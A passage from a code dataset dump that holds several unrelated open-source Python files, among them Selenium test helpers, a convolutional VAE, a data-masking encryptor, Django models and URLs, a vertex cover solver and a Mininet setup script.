expected_conditions.element_to_be_clickable((By.XPATH, xpath))\n )\n\n def wait_for_css_to_be_clickable(self, css, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.element_to_be_clickable((By.CSS_SELECTOR, css))\n )\n\n def wait_for_css_to_be_unclickable(self, css, timeout=10):\n return WebDriverWait(self, timeout).until_not(\n expected_conditions.element_to_be_clickable((By.CSS_SELECTOR, css))\n )\n\n def scroll_to_element(self, element, scroll_parent=False):\n scroll_script = (\n \"\"\"\n arguments[0].scrollIntoView();\n \"\"\"\n if scroll_parent\n else \"\"\"\n const viewPortHeight = Math.max(document.documentElement.clientHeight, window.innerHeight || 0);\n const elementTop = arguments[0].getBoundingClientRect().top;\n window.scrollBy(0, elementTop - (viewPortHeight / 2));\n \"\"\"\n )\n self.execute_script(scroll_script, element)\n\n def scroll_to_element_and_click(self, element, timeout=10, scroll_parent=False):\n self.scroll_to_element(element, scroll_parent=scroll_parent)\n ActionChains(self).move_to_element(element).perform()\n\n try:\n return element.click()\n except ElementClickInterceptedException:\n pass\n except StaleElementReferenceException:\n pass\n\n try:\n return self.execute_script(\"arguments[0].click();\", element)\n except JavascriptException:\n pass\n except StaleElementReferenceException:\n pass\n\n # Tried to click something that's not a button, try sending\n # a mouse click to that coordinate\n ActionChains(self).click().perform()\n\n def click_xpath(self, xpath, wait_clickable=True, timeout=10, scroll_parent=False):\n if wait_clickable:\n element = self.wait_for_xpath_to_be_clickable(xpath, timeout=timeout)\n else:\n element = self.wait_for_xpath(xpath)\n return self.scroll_to_element_and_click(element, scroll_parent=scroll_parent)\n\n def click_css(self, css, timeout=10, scroll_parent=False):\n element = self.wait_for_css_to_be_clickable(css, timeout=timeout)\n return self.scroll_to_element_and_click(element, scroll_parent=scroll_parent)\n\n\n@pytest.fixture(scope=\"session\")\ndef driver(request):\n from selenium import webdriver\n\n options = webdriver.firefox.options.Options()\n if \"BASELAYER_TEST_HEADLESS\" in os.environ:\n options.headless = True\n options.set_preference(\"devtools.console.stdout.content\", True)\n options.set_preference(\"browser.download.manager.showWhenStarting\", False)\n options.set_preference(\"browser.download.folderList\", 2)\n options.set_preference(\n \"browser.download.dir\", os.path.abspath(cfg[\"paths.downloads_folder\"])\n )\n options.set_preference(\n \"browser.helperApps.neverAsk.saveToDisk\",\n (\n \"text/csv,text/plain,application/octet-stream,\"\n \"text/comma-separated-values,text/html\"\n ),\n )\n\n driver = MyCustomWebDriver(options=options)\n driver.set_window_size(1920, 1200)\n login(driver)\n\n yield driver\n\n driver.close()\n\n\ndef login(driver):\n username_xpath = '//*[contains(string(),\"testuser-cesium-ml-org\")]'\n\n driver.get(\"/\")\n try:\n driver.wait_for_xpath(username_xpath, 0.25)\n return # Already logged in\n except TimeoutException:\n pass\n\n try:\n element = driver.wait_for_xpath(\n '//a[contains(@href,\"/login/google-oauth2\")]', 20\n )\n element.click()\n except TimeoutException:\n pass\n\n try:\n driver.wait_for_xpath(username_xpath, 5)\n except TimeoutException:\n raise TimeoutException(\"Login failed:\\n\" + driver.page_source)\n\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef reset_state(request):\n def teardown():\n models.DBSession().rollback()\n\n request.addfinalizer(teardown)\n","repo_name":"cesium-ml/baselayer","sub_path":"app/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":6881,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"23212766745","text":"###############################################################################\n# #\n# This program is free software: you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation, either version 3 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program. If not, see . #\n# #\n###############################################################################\n\nfrom tensorflow.keras.layers import Lambda, Input, Dense, BatchNormalization, Conv2D, Conv2DTranspose, Concatenate\nimport tensorflow as tf\nimport numpy as np\nfrom scivae import VAE\n\n\nfrom tensorflow.keras.layers import Dropout\n\nclass ConvVAE(VAE):\n\n \"\"\"\n References:\n https://www.tensorflow.org/tutorials/generative/cvae\n\n \"\"\"\n\n def __init__(self, input_data_np: np.array, output_data_np: np.array, labels: list, config, vae_label=None,\n sciutil=None, config_as_str=False, empty=False):\n\n super().__init__(input_data_np, output_data_np, labels, config, vae_label, sciutil, config_as_str, empty)\n self.__last_encoding_shape = None\n\n def default_inputs(self):\n if self.multi_output:\n # The first one always has to be 2D and second 1D\n self.inputs_x = [Input(shape=(self.input_size[0][0], self.input_size[0][1], 1), name='default_input_0'),\n Input(shape=(self.input_size[1],), name='default_input_1')]\n else:\n self.inputs_x = Input(shape=(self.input_size[0], self.input_size[1], 1), name='default_input')\n return self.inputs_x\n\n def build_encoder(self):\n # Check if multi - if so we need to concatenate our layers see:\n # https://github.com/CancerAI-CL/IntegrativeVAEs/blob/master/code/models/xvae.py\n layer_start_idx = 0\n if self.multi_output:\n # If we have a fist layer if\n layer = self.encoding_config['layers'][0]\n # ToDo: refactor to handle arbitary number of inputs\n # For now we just need to ensure the first two layers are encoded separately\n # The first one is built using a conv layer\n encoding_0 = self.build_encoding_layer(layer, self.inputs_x[0], layer['activation_fn'])\n # We need to add a dense layer to combine these, we can't simply concatenate them because 1 is\n # a\n self.encoding = [encoding_0]\n layer_start_idx = 1 # Since we have already done the first\n else:\n self.encoding = self.inputs_x\n # Now for subsequent layers we run this\n for layer_idx in range(layer_start_idx, len(self.encoding_config['layers'])):\n layer = self.encoding_config['layers'][layer_idx]\n # Again here we're only encoding the input data rather than the labels as well\n if self.multi_output:\n self.encoding[0] = self.build_encoding_layer(layer, self.encoding[0], layer['activation_fn'])\n else:\n self.encoding = self.build_encoding_layer(layer, self.encoding, layer['activation_fn'])\n\n if self.multi_output:\n self.__last_encoding_shape = [self.encoding[0].shape] # We just pass the label through\n else:\n self.__last_encoding_shape = self.encoding.shape\n return self.encoding\n\n def build_decoder(self):\n # Generate input to the decoder which is based on random sampling (we then compare this to the reconstructed\n # values using the input as our output\n self.latent_inputs = Input(shape=(self.latent_config['num_nodes'],), name='z_sampling')\n self.decoding = self.latent_inputs\n # Here we also need to check for the multi output if so we don't do the last layer normally\n layer_end_idx = len(self.decoding_config['layers'])\n # Add in the first one which requires a reshape from the dense latent space\n s = self.__last_encoding_shape # ToDo: make more general Only doing this for 2D conv\n if self.multi_output:\n self.decoding = [Dense(units=s[0][1] * s[0][2] * s[0][3], activation=tf.nn.relu)(self.decoding),\n Dense(units=s[0][1] * s[0][2] * s[0][3], activation=tf.nn.relu)(self.decoding)]\n # Here we reshape one of them but keep the other as just normal output rather than CNN\n self.decoding[0] = tf.keras.layers.Reshape(target_shape=(s[0][1], s[0][2], s[0][3]))(self.decoding[0])\n else:\n self.decoding = Dense(units=s[1] * s[2] * s[3], activation=tf.nn.relu)(self.decoding)\n self.decoding = tf.keras.layers.Reshape(target_shape=(s[1], s[2], s[3]))(self.decoding)\n for layer_idx in range(1, layer_end_idx - 1):\n layer = self.decoding_config['layers'][layer_idx]\n if self.multi_output:\n self.decoding[0] = self.build_decoding_layer(layer[0], self.decoding[0], layer[0]['activation_fn'])\n self.decoding[1] = self.build_layer(layer[1]['num_nodes'], self.decoding[1], layer[1]['activation_fn'])\n else:\n self.decoding = self.build_decoding_layer(layer, self.decoding, layer['activation_fn'])\n\n # Build the last layer\n if self.multi_output:\n self.decoding = self.build_multi_output([self.decoding[0], self.decoding[1]])\n else:\n self.decoding = self.build_decoding_layer(self.decoding_config['layers'][-1], self.decoding,\n self.output_activation_fn)\n return self.decoding\n\n def build_multi_output(self, decoding_layer):\n \"\"\" ToDo: Modularise this to have an arbitary number of layers.\n Note: the way this currently works, the labels have to be the second option and the data is the first! \"\"\"\n # Add in the final layer\n decoder_0 = self.build_decoding_layer(self.decoding_config['layers'][-1][0], decoding_layer[0],\n self.output_activation_fn)\n\n # Add in final layer for decoder 2\n decoder_1 = self.build_layer(self.decoding_config['layers'][-1][1]['num_nodes'], decoding_layer[1],\n self.output_activation_fn)\n decoder_1 = self.build_layer(self.output_size[1], decoder_1, self.output_activation_fn)\n return [decoder_0, decoder_1]\n\n def build_encoding_layer(self, layer, prev_layer, activation_fn='selu'):\n filters = layer.get('filters')\n kernel_size = layer.get('kernel_size')\n pooling = layer.get('pooling')\n strides = layer.get('strides')\n padding = layer.get('padding')\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding=padding, strides=strides,\n activation=activation_fn)(prev_layer)\n dropout = layer.get('dropout')\n if dropout:\n x = Dropout(dropout)(x)\n # Perform batch normalisation\n if self.batch_norm:\n x = BatchNormalization()(x)\n return x\n\n def build_decoding_layer(self, layer, prev_layer, activation_fn='selu'):\n filters = layer.get('filters')\n kernel_size = layer.get('kernel_size')\n pooling = layer.get('pooling')\n strides = layer.get('strides')\n padding = layer.get('padding')\n x = Conv2DTranspose(filters=filters, kernel_size=kernel_size, padding=padding, strides=strides,\n activation=activation_fn)(prev_layer)\n dropout = layer.get('dropout')\n if dropout:\n x = Dropout(dropout)(x)\n # Perform batch normalisation\n if self.batch_norm:\n x = BatchNormalization()(x)\n return x\n\n def build_embedding(self):\n # Flatten before encoding!\n # Check if it's the multi because we now combine it\n if self.multi_output:\n # Flatten the layers and concat our labels and the\n self.encoding = tf.keras.layers.Flatten()(self.encoding[0])\n else:\n self.encoding = tf.keras.layers.Flatten()(self.encoding)\n self.latent_z_mean = Dense(self.latent_config['num_nodes'], name='z_mean')(self.encoding)\n self.latent_z_log_sigma = Dense(self.latent_config['num_nodes'], name='z_log_sigma',\n kernel_initializer='zeros')(self.encoding)\n self.latent_z = Lambda(self.sample, output_shape=(self.latent_config['num_nodes'],), name='z')([\n self.latent_z_mean, self.latent_z_log_sigma])\n","repo_name":"ArianeMora/scivae","sub_path":"scivae/conv_vae.py","file_name":"conv_vae.py","file_ext":"py","file_size_in_byte":9332,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"41632211026","text":"from re import findall\nfrom typing import Any, List, Tuple, Union\n\nfrom math import ceil, floor\n\nfrom watchmen_data_kernel.common import DataKernelException\nfrom watchmen_model.admin import FactorEncryptMethod\nfrom watchmen_utilities import ArrayHelper\nfrom .encryptor import Encryptor\n\n\nclass CenterMasker(Encryptor):\n\tdef __init__(self, digits: int):\n\t\tself.digits = digits\n\t\tif digits == 3:\n\t\t\tself.method = FactorEncryptMethod.MASK_CENTER_3\n\t\telif digits == 5:\n\t\t\tself.method = FactorEncryptMethod.MASK_CENTER_5\n\t\telse:\n\t\t\traise DataKernelException(f'Only 3 or 5 digits center mask is supported, current is [{digits}].')\n\n\tdef accept(self, method: Union[FactorEncryptMethod, str]) -> bool:\n\t\treturn method == self.method\n\n\tdef is_encrypted(self, value: Any) -> bool:\n\t\t\"\"\"\n\t\talways returns false\n\t\t\"\"\"\n\t\treturn False\n\n\tdef do_encrypt_as_normal(self, value: str, length: int) -> str:\n\t\tdigits = self.digits\n\t\tremains = length - digits\n\t\tif remains % 2 == 1:\n\t\t\tpad_count = floor(remains / 2)\n\t\t\treturn f'{value[:pad_count + 1]}{\"*\" * digits}{value[length - pad_count:]}'\n\t\telse:\n\t\t\tpad_count = int(remains / 2)\n\t\t\treturn f'{value[:pad_count]}{\"*\" * digits}{value[length - pad_count:]}'\n\n\t# noinspection PyMethodMayBeStatic\n\tdef replace_from_left(self, segment: str, remain_chars_count: int) -> Tuple[int, str]:\n\t\tchar_count = len(segment)\n\t\tif char_count >= remain_chars_count:\n\t\t\treturn 0, f'{\"*\" * remain_chars_count}{segment[remain_chars_count:]}'\n\t\telse:\n\t\t\treturn remain_chars_count - char_count, '*' * char_count\n\n\t# noinspection PyMethodMayBeStatic\n\tdef replace_from_right(self, segment: str, remain_chars_count: int) -> Tuple[int, str]:\n\t\tchar_count = len(segment)\n\t\tif char_count >= remain_chars_count:\n\t\t\treturn 0, f'{segment[:0 - remain_chars_count]}{\"*\" * remain_chars_count}'\n\t\telse:\n\t\t\treturn remain_chars_count - char_count, '*' * char_count\n\n\tdef do_encrypt(self, value: Any) -> Any:\n\t\tdigits = self.digits\n\n\t\tvalue = str(value)\n\t\tlength = len(value)\n\t\tif length <= digits:\n\t\t\t# mask all\n\t\t\treturn '*' * length\n\n\t\t# last part is empty, ignored\n\t\tsegments = ArrayHelper(findall(r'((\\d+|\\D*)?)', value)[:-1]).map(lambda x: x[0]).to_list()\n\t\tdecimal_char_count = ArrayHelper(segments).filter(lambda x: x.isdecimal()) \\\n\t\t\t.reduce(lambda count, x: count + len(x), 0)\n\t\tif decimal_char_count < digits:\n\t\t\t# no enough decimal characters, mask as normal string\n\t\t\treturn self.do_encrypt_as_normal(value, length)\n\n\t\tdecimal_count = len([segment for segment in segments if segment.isdecimal()])\n\t\tif decimal_count == 1:\n\t\t\t# only one part\n\t\t\treplaced_segments = []\n\t\t\tfor segment in segments:\n\t\t\t\tif segment.isdecimal():\n\t\t\t\t\treplaced_segments.append(f'{\"*\" * digits}{segment[digits:]}')\n\t\t\t\telse:\n\t\t\t\t\treplaced_segments.append(segment)\n\t\t\treturn ''.join(replaced_segments)\n\n\t\t# at least 2 decimal parts\n\t\tcentral_index = ceil((decimal_count + 1) / 2)\n\t\tindex = 0\n\n\t\treplaced_segments: List[str] = []\n\t\tcurrent_index = central_index\n\t\tremain_count = digits\n\n\t\tfor segment in segments:\n\t\t\tif segment.isdecimal():\n\t\t\t\tindex = index + 1\n\t\t\t\tif index == current_index:\n\t\t\t\t\tremain_count, replaced = self.replace_from_left(segment, remain_count)\n\t\t\t\t\treplaced_segments.append(replaced)\n\t\t\t\t\tif remain_count != 0:\n\t\t\t\t\t\t# try to replace next decimal segment\n\t\t\t\t\t\tcurrent_index = current_index + 1\n\t\t\t\telse:\n\t\t\t\t\treplaced_segments.append(segment)\n\t\t\telse:\n\t\t\t\treplaced_segments.append(segment)\n\n\t\tif remain_count == 0:\n\t\t\treturn ''.join(replaced_segments)\n\t\telse:\n\t\t\t# still not enough characters, try to look backward\n\t\t\tcurrent_index = central_index - 1\n\t\t\twhile current_index > 0:\n\t\t\t\tsegments = replaced_segments\n\t\t\t\treplaced_segments = []\n\t\t\t\tindex = 0\n\t\t\t\tfor segment in segments:\n\t\t\t\t\tif segment.isdecimal():\n\t\t\t\t\t\tindex = index + 1\n\t\t\t\t\t\tif index == current_index:\n\t\t\t\t\t\t\tremain_count, replaced = self.replace_from_right(segment, remain_count)\n\t\t\t\t\t\t\treplaced_segments.append(replaced)\n\t\t\t\t\t\t\tif remain_count != 0:\n\t\t\t\t\t\t\t\t# look backward again\n\t\t\t\t\t\t\t\tcurrent_index = current_index - 1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# break\n\t\t\t\t\t\t\t\tcurrent_index = 0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\treplaced_segments.append(segment)\n\t\t\t\t\telse:\n\t\t\t\t\t\treplaced_segments.append(segment)\n\t\t\treturn ''.join(replaced_segments)\n\n\tdef do_decrypt(self, value: str) -> str:\n\t\t# center mask cannot be decrypted\n\t\treturn value\n\n\tdef get_key_type(self) -> str:\n\t\treturn self.method.value\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen","sub_path":"packages/watchmen-data-kernel/src/watchmen_data_kernel/encryption/center_masker.py","file_name":"center_masker.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"9041386758","text":"guest_count = int(input())\n\nregular = []\nvip = []\n\nexpected_guests = []\n\nfor x in range(guest_count):\n guest = input()\n expected_guests.append(guest)\n\ncommand = input()\n\nwhile command != \"END\":\n current_guest = command\n if current_guest in expected_guests:\n expected_guests.remove(current_guest)\n command = input()\n\nfor x in expected_guests:\n for letter in x:\n if letter.isdigit():\n vip.append(x)\n break\n else:\n regular.append(x)\n break\nprint(len(expected_guests))\n\nfor i in sorted(vip):\n print(i)\n\nfor j in sorted(regular):\n print(j)\n\n\n#\n# n = int(input())\n#\n# vip_guests = set()\n# regular_guests = set()\n#\n# for _ in range(n):\n# ticket = input()\n# if ticket[0].isdigit() and len(ticket) == 8:\n# vip_guests.add(ticket)\n# elif len(ticket) == 8:\n# regular_guests.add(ticket)\n#\n# guest = input()\n#\n# not_on_the_party = []\n#\n# while guest != \"END\":\n# if guest in vip_guests:\n# vip_guests.remove(guest)\n# elif guest in regular_guests:\n# regular_guests.remove(guest)\n# guest = input()\n#\n# print(len(vip_guests) + len(regular_guests))\n#\n# for i in sorted(vip_guests):\n# print(i)\n# for j in sorted(regular_guests):\n# print(j)","repo_name":"ZvezdelinaPetrova/Softuni","sub_path":"advanced/tulips and sets/lab/05. SoftUni Party.py","file_name":"05. SoftUni Party.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72608673401","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import CASCADE, Sum\nfrom django.urls import reverse\n\n\nclass Achievement(models.Model):\n name = models.CharField(max_length=20)\n description = models.TextField()\n image = models.ImageField(default=None)\n\n\nclass Employee(User):\n user = models.ForeignKey(User, on_delete=CASCADE, related_name='+')\n achievements = models.ManyToManyField(Achievement, blank=True)\n\n\nclass Dish(models.Model):\n name = models.CharField(max_length=20)\n description = models.TextField()\n price = models.DecimalField(max_digits=5, decimal_places=2)\n\n class Meta:\n verbose_name_plural = 'Dishes'\n\n def __str__(self):\n return self.name\n\n\nclass Order(models.Model):\n table = models.IntegerField()\n employee = models.ForeignKey(User, on_delete=CASCADE)\n tip = models.IntegerField(default=0)\n paid_amount = models.IntegerField(default=0)\n dishes = models.ManyToManyField(Dish, related_name='order_dishes')\n date = models.DateField(auto_now_add=True)\n is_open = models.BooleanField(default=True)\n\n def __str__(self):\n return f'Order for table no. {self.table}'\n\n def get_absolute_url(self):\n return reverse('order_detail', args=[str(self.id)])\n\n def get_full_price(self):\n try:\n full_price = Order.objects.get(pk=self.pk).dishes.aggregate(Sum('price'))['price__sum']\n except Order.DoesNotExist:\n full_price = None\n return full_price\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None, *args, **kwargs):\n try:\n self.tip = self.paid_amount - self.get_full_price()\n except TypeError:\n self.tip = 0\n super(Order, self).save(*args, **kwargs)\n","repo_name":"Cieszk/Restaurant-App","sub_path":"arepo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18446681299","text":"from code_challenges.trees.trees import BinaryTree,Node\nfrom code_challenges.hashmap_tree_intersection.hashmap_tree_intersection import tree_intersection\n\ndef test_empty_tree():\n tree1=BinaryTree()\n tree2=BinaryTree()\n actual=tree_intersection(tree1,tree2)\n expect=None\n assert actual== expect\n\n\n\ndef test_one_tree():\n bt = BinaryTree()\n bt1 = BinaryTree()\n bt1.root = Node(\"12\")\n bt1.root.right = Node(\"100\")\n bt1.root.left = Node(\"200\")\n bt1.root.left.left = Node(\"100\")\n bt1.root.left.right = Node(\"50\")\n bt1.root.right.left = Node(\"60\")\n assert None == tree_intersection(bt, bt1)\n\n\ndef test_common_values():\n bt = BinaryTree()\n bt1 = BinaryTree()\n bt.root = Node(\"100\")\n bt.root.right = Node(\"20\")\n bt.root.left = Node(\"50\")\n bt.root.left.left = Node(\"5\")\n bt.root.left.right = Node(\"15\")\n bt1.root = Node(\"20\")\n bt1.root.right = Node(\"150\")\n bt1.root.left = Node(\"100\")\n bt1.root.left.left = Node(\"5\")\n bt1.root.left.right = Node(\"6\")\n bt1.root.right.left = Node(\"7\")\n assert ['20','100','5'] == tree_intersection(bt, bt1)\n","repo_name":"sarazwairi/data-structures-and-algorithms","sub_path":"python/code_challenges/hashmap_tree_intersection/test_hashmap_tree_intersection.py","file_name":"test_hashmap_tree_intersection.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13416601970","text":"import sys\n\n\nclass Vertex:\n def __init__(self, key):\n self.id = key\n self.edges = []\n self.degree = 0\n\n def __repr__(self):\n return str(self.id)\n\n def __eq__(self, other):\n if not isinstance(other, Vertex):\n return False\n else:\n return self.id == other.id\n\n def __lt__(self, other):\n return self.id < other.id\n\n def reset_edges(self):\n self.edges = []\n\n\nclass Graph:\n def __init__(self, V, E):\n self.V = V\n self.E = E\n self.load_edges()\n\n def load_edges(self):\n for v in self.V:\n self.V[v].reset_edges()\n\n for edge in self.E:\n edge[0].edges.append(edge[1])\n edge[0].degree += 1\n\n def get_vertices(self):\n return self.V.values()\n\n def get_edges(self):\n return self.E\n\n\ndef read_in_file(filename):\n V = {}\n E = []\n new_lines = []\n with open(filename, 'r') as f:\n lines = f.readlines()\n for i in range(len(lines)):\n new_lines.append(lines[i].strip().split(sep=' '))\n\n for line in new_lines:\n if line[0] not in V:\n V[line[0]] = Vertex(int(line[0]))\n if line[1] not in V:\n V[line[1]] = Vertex(int(line[1]))\n E.append([V[line[0]], V[line[1]]])\n E.append([V[line[1]], V[line[0]]])\n E.sort()\n return Graph(V, E)\n\n\ndef smart_greedy_VC(G: Graph):\n C = []\n H = Graph(G.V.copy(), G.E.copy())\n\n while H.get_edges() != []:\n max_degree = 0\n v = None\n for vert in H.get_vertices():\n if vert.degree > max_degree:\n max_degree = vert.degree\n v = vert.id\n\n new_V = {}\n for vert in H.get_vertices():\n if vert.id != v:\n new_V[str(vert.id)] = vert\n\n new_E = []\n for e in H.get_edges():\n if H.V[str(v)] not in e:\n new_E.append(e)\n\n H = Graph(new_V, new_E)\n C.append(v)\n return C\n\n\ndef basic_greedy_VC(G: Graph):\n C = []\n H = Graph(G.V.copy(), G.E.copy())\n\n while H.get_edges() != []:\n (u, v) = H.get_edges()[0]\n\n new_E = []\n for e in H.get_edges():\n if u not in e and v not in e:\n new_E.append(e)\n\n new_V = {}\n for vert in H.get_vertices():\n for e in new_E:\n if (vert.id == e[0] or vert.id == e[1]) and vert not in new_V:\n new_V[str(vert.id)] = vert\n\n H = Graph(new_V, new_E)\n C.append(u)\n C.append(v)\n return C\n\n\ndef VC_checker(G: Graph, C):\n covered = []\n for e in G.get_edges():\n for v in C:\n if v in e and e not in covered:\n covered.append(e)\n\n return len(covered) == len(G.get_edges())\n\n\ndef get_subsets(V, n):\n if n == 0:\n return [[]]\n\n subsets = []\n for i in range(len(V)):\n cur = V[i]\n rest = V[i+1:]\n rest_subsets = get_subsets(rest, n-1)\n\n for v in rest_subsets:\n subsets.append([cur, *v])\n\n return subsets\n\n\ndef brute_force_VC(G: Graph):\n for i in range(1, len(G.get_vertices())):\n subsets = get_subsets(list(G.get_vertices()), i)\n for s in subsets:\n if VC_checker(G, s):\n return s\n\n\ndef save_output(out, sg, bg, bf):\n with open('my' + out + '.txt', 'w') as f:\n f.write(\"log-Approximation: %s\" % ' '.join([str(v) for v in sg])+\"\\n\")\n f.write(\"2-Approximation: %s\" % ' '.join([str(v) for v in bg])+\"\\n\")\n f.write(\"Exact Solution: %s\" % ' '.join([str(v) for v in bf]))\n\n\ndef main(argv):\n G = read_in_file(argv[1])\n sg = smart_greedy_VC(G)\n bg = basic_greedy_VC(G)\n bf = brute_force_VC(G)\n save_output(argv[1][-5], sg, bg, bf)\n print(\"log-Approximation: %s\" % ' '.join([str(v) for v in sg]))\n print(\"2-Approximation: %s\" % ' '.join([str(v) for v in bg]))\n print(\"Exact Solution: %s\" % ' '.join([str(v) for v in bf]))\n\n\nif __name__ == '__main__':\n main(sys.argv)\n # main([0, 'in1.txt', 'my1.txt'])\n","repo_name":"Wander03/CSC349","sub_path":"asgn4/vertex_cover.py","file_name":"vertex_cover.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7262890569","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport yaml\nimport sys\n\nargs = sys.argv\nif (len(args) != 6):\n print(\"usage: python3 scripts/plot.py WORKLOAD NCPU LOGSIZE FORK_NUM REPEAT_NUM\")\n exit(1)\n\nnprocs = ['100', '5000', '15000']\npolicies = ['default', 'multiple']\nworkload = args[1]\nncpu = args[2]\nlogsize = args[3]\nforknum = args[4]\nrepeatnum = args[5]\n\nif (workload == \"largewrite\"):\n forknum = ''\n\nx1 = [1, 2, 3]\nx2 = [1.3, 2.3, 3.3]\n\ncategory = [\"time_turnaround\", \"cpu_usage\", \"runtime\", \"balancing\", \"counters\", \"time_response\"]\n# index = [\"average\", \"average\", \"standard\", \"standard\", \"contextswitch\"]\nytitle = [\"turnaround time [clock]\", \"cpu usage [%]\", \"std of cpu time per cpu\", \\\n \"std of cpu occupancy per process\", \"number of context switch\", \"response time [clock]\"]\n\nfor i in range(len(category)):\n y = {}\n\n for policy in policies:\n values = []\n for nproc in nprocs:\n with open('log/' + workload + '/' + policy + '_cpu' + ncpu + '_nproc' + nproc + \\\n '_fork' + forknum + '_logsize' + logsize + '/' + 'summary.yaml') as file:\n obj = yaml.safe_load(file)\n values.append(obj[category[i]][\"average\"])\n y[policy] = values\n\n fig, ax = plt.subplots()\n ax.set_xlabel('size of ptable')\n ax.set_ylabel(ytitle[i])\n\n plt.bar(x1, y[\"default\"], color='#BF616A', width=0.25, label='round robin', align=\"center\")\n plt.bar(x2, y[\"multiple\"], color='#5E81AC', width=0.25, label='multiple runqueue', align=\"center\")\n plt.legend(loc='center left', bbox_to_anchor=(1., .5), title=\"scheduling policy\")\n\n plt.xticks([1.15, 2.15, 3.15], nprocs)\n plt.savefig(\"fig/\" + workload + \"/\" + category[i] + \".png\", bbox_inches=\"tight\")\n","repo_name":"wkb8s/b4_research","sub_path":"scripts/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35023765953","text":"from django.urls import path\n\nfrom .views import article_list, ArticleDetailView, ArticleCommentView, article_likes, ArticleSearchView\n\n\n#我们通过 app_name='article' 告诉 Django 这个 urls.py 模块是属于article应用的,这种技术叫做视图函数命名空间。\n#因为此处通过 name 属性给这些视图函数取了个别名,但是一个项目中可能也存在其他name叫同名的,为了防止冲突呢,方法就是通过 app_name 来指定命名空间\n\napp_name = 'article'\nurlpatterns = [\n\n # 文章列表\n path('', article_list, name='article_list'),\n\n # 文章详情(内容)\n path(r'detail-.html', ArticleDetailView.as_view(), name='article_detail'),\n\n # 文章点赞\n path(r'/likes/', article_likes, name='article_likes'),\n\n # 文章评论\n path(r'/comments/', ArticleCommentView.as_view(), name='article_comments'),\n\n # 文章搜索\n path('search/', ArticleSearchView(), name='search'), #因为我们SearchView 默认是有__call__方法的,所以可以直接通过类名调用\n\n]\n","repo_name":"juehuan182/QmpythonBlog","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12370692227","text":"#!/usr/bin/env python\n\n\"Setuptools params\"\n\nfrom setuptools import setup, find_packages\nfrom os.path import join\n\nscripts = [ join( 'bin', filename ) for filename in [ \n 'mn', 'mnexec' ] ]\n\nmodname = distname = 'mininet'\n\nsetup(\n name=distname,\n version='0.0.0',\n description='Process-based OpenFlow emulator',\n author='Bob Lantz',\n author_email='rlantz@cs.stanford.edu',\n packages=find_packages(exclude='test'),\n long_description=\"\"\"\nInsert longer description here.\n \"\"\",\n classifiers=[\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Programming Language :: Python\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Topic :: Internet\",\n ],\n keywords='networking protocol Internet OpenFlow',\n license='unspecified',\n install_requires=[\n 'setuptools',\n 'networkx'\n ],\n scripts=scripts,\n)\n","repo_name":"nikhilh/mininet-rt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4490025186","text":"import re\n\nlist_detect_regex = re.compile(r\"(?<=\\[).*(?=\\])\")\nlist_split_regex = re.compile(r\"\\s*,\\s*\")\n\ndef get_par(inp: str, par: str, typ = int):\n regex = re.compile(par + r\"\\s*=\\s*(?P.*)\\s*;\")\n res = regex.search(inp).group(\"val\")\n list_res = list_detect_regex.search(res)\n if list_res:\n vals_str = list_res.group(0)\n print(vals_str)\n value_list = list_split_regex.split(vals_str)\n return list(map(typ, value_list))\n return typ(res)","repo_name":"tudyoctav/IDMP-Constrained-Shortest-Path","sub_path":"sat/model/parse_dzn.py","file_name":"parse_dzn.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"8334279910","text":"import numpy as np\r\nfrom numpy.linalg import inv\r\nimport matplotlib.pyplot as plt\r\n\r\nI = np.array([[0.2, 0.3, 0.4, 0.5, 0.6]]).T\r\nV = np.array([[1.23, 1.38, 2.06, 2.47, 3.17]]).T\r\n\r\nplt.scatter(I, V)\r\nplt.xlabel('Current (A)')\r\nplt.ylabel('Voltage (V)')\r\nplt.grid(True)\r\nplt.show()\r\n\r\n## Batch Solution\r\n\r\nH = np.ones((5, 2))\r\nH[:, 0] = 